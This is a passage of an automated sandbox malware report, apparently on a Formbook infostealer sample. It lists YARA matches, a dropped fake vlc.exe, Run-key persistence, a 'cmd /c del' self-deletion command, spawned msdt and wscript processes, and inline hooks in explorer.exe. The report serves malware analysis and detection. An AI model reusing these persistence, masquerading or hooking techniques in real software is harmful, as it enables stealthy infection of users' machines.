          Source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vlc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vlc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vlc.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@14/4@7/2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLANJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_01
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeVirustotal: Detection: 30%
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeReversingLabs: Detection: 29%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: vlc.exe, 00000005.00000002.474832905.00000000036D0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.422100593.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: vlc.exe, 0000000B.00000002.431355918.00000000035C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000001.00000002.362276852.00000000014EF000.00000040.00000001.sdmp, vlc.exe, 00000005.00000002.473073609.000000000188F000.00000040.00000001.sdmp, vlc.exe, 0000000B.00000002.430919209.0000000001B3F000.00000040.00000001.sdmp, msdt.exe, 0000000C.00000002.604110676.0000000004FF0000.00000040.00000001.sdmp, wscript.exe, 00000013.00000002.472464657.0000000004720000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, vlc.exe, vlc.exe, 0000000B.00000002.430919209.0000000001B3F000.00000040.00000001.sdmp, msdt.exe, 0000000C.00000002.604110676.0000000004FF0000.00000040.00000001.sdmp, wscript.exe, 00000013.00000002.472464657.0000000004720000.00000040.00000001.sdmp
          Source: Binary string: wscript.pdb source: vlc.exe, 00000005.00000002.474832905.00000000036D0000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: vlc.exe, 0000000B.00000002.431355918.00000000035C0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.422100593.0000000007CA0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 0_2_0798219F push E9000001h; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_004178AD push 00000001h; retf
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_004172D7 push edi; retf
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_00419D5A push ebp; iretd
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0040D695 push esp; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013D191C pushfd ; iretd
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0144D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013D322C push eax; retf
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013D427E pushad ; retf 000Dh
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013D9271 push es; iretd
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013D225E push eax; retf
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013D4288 pushad ; retf
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013D3F9F pushad ; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013DA7C0 push es; iretd
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 2_2_07152192 push E9000001h; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_004178AD push 00000001h; retf
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_004172D7 push edi; retf
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_00419D5A push ebp; iretd
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0040D695 push esp; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0041CEB5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0041CF6C push eax; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0041CF02 push eax; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_0041CF0B push eax; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017ED0D1 push ecx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.97600028112
          Source: initial sampleStatic PE information: section name: .text entropy: 7.97600028112
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLANJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe\:Zone.Identifier:$DATAJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlcJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlcJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xEC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
